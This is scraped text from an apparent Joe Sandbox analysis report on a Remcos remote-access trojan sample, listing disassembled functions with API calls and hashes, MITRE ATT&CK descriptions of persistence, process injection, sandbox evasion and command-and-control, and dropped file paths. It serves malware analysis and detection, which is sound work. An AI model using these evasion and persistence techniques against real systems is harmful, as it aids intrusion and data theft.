Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
Instruction Fuzzy Hash: 7FF082363046047BDB119F55DC08B9B7B9CEF91750F10C03BFA489A180D6B099648B59

Function 004057E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405809
CloseHandle.KERNEL32(?), ref: 00405816

Strings

Error launching installer, xrefs: 004057F3

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction ID: ab941a05c4999c1485253c76fd5e070cef9538b2f1a85a786da17f0f1360f2f3
Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction Fuzzy Hash: 6FE04FF06002097FEB00AF60EE49F7B77ACEB10704F808431BD00F2150D67898548A7C

Function 00406C02 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
Instruction ID: d064f3aa3bd4e65581b7a02d8d7766993962991d4d56626c18abd3cfb9ccca21
Opcode Fuzzy Hash: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
Instruction Fuzzy Hash: 18A12271E00229CBDF28CFA8C8946ADBBB1FF44305F15856ED456BB281C7786A86DF44

Function 00406E03 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
Instruction ID: 090b0d4ea1aa0bf32c33cfea42ca504b17bc5dd94af43198fda2cf7b81042a45
Opcode Fuzzy Hash: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
Instruction Fuzzy Hash: 0B911070D00229CBDF28CF98C8987ADBBB1FB44305F15816ED856BB281C7785A86DF44

Function 00406B19 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
Instruction ID: 9fff5468755916abca62c5e968c05a7427fefad9d8c85ea6c4cb17611be317d2
Opcode Fuzzy Hash: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
Instruction Fuzzy Hash: 50815471D04228CFDF24CFA8C8887ADBBB1FB45305F25816AD416BB281C7389A86DF55

Function 0040661E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
Instruction ID: ce274397434e12883866e7d5aca5d494dd0bd3f11d15aed25330077a73a38ecb
Opcode Fuzzy Hash: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
Instruction Fuzzy Hash: 91816671D04228CBDF24CFA8C8447AEBBB1FB44305F25816AD456BB281C7785A86DF45

Function 00406A6C Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
Instruction ID: 712327b4ba360f9873406890bfa66a7551055db31e5b4cf32af7873ce0627a0f
Opcode Fuzzy Hash: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
Instruction Fuzzy Hash: D9714271D00228CFDF24CFA8C894BADBBB1FB48305F15816AD816BB281C7385A96DF54

Function 00406B8A Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
Instruction ID: c0b605097b164116130eca60b1ab140e50dfbcee6288daaa4b45a2748c60fc6f
Opcode Fuzzy Hash: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
Instruction Fuzzy Hash: 01713271E00228CBDF28CFA8C894BADBBB1FB44305F15816ED416BB281C7785A96DF55

Function 00406AD6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
Instruction ID: df23799fdaa3b0d09e183135811d5b6505fb0232db5b531e6c94311c9a263d3d
Opcode Fuzzy Hash: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
Instruction Fuzzy Hash: E9713271D00228CBDF28CF98C894BADBBB1FB44305F15816ED456BB281C7785A96DF45

Function 00405C3F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C67
CharNextA.USER32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C78
lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
Instruction ID: e9647eef7302a9b27fadec00dc75fba78c5d05178a58941879d213f1a9d3a1c7
Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
Instruction Fuzzy Hash: 5BF0C231105918FFDB029FA4DD409AEBBA8EF05250B2540BAE840F7210D634EE01AB98

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IpykYx5iwz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BeConf.ini

C:\Users\user\AppData\Local\Temp\nsk70B1.tmp

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll

C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Afprikkendes.pse

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Carettochelydidae.Fla

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Gemen.Aer

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Unshieldable.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\amorphism.rds

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\brolins.par

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\gruffness.mis

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\kamik.sen

Windows Analysis Report
IpykYx5iwz.exe

Function 00403384 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 004053A6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405909 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Function 00403CFB Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040395E Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E14 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 204
memoryCOMMON

Function 00406163 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00405268 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00402D75 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Function 0040572E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 0040646B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON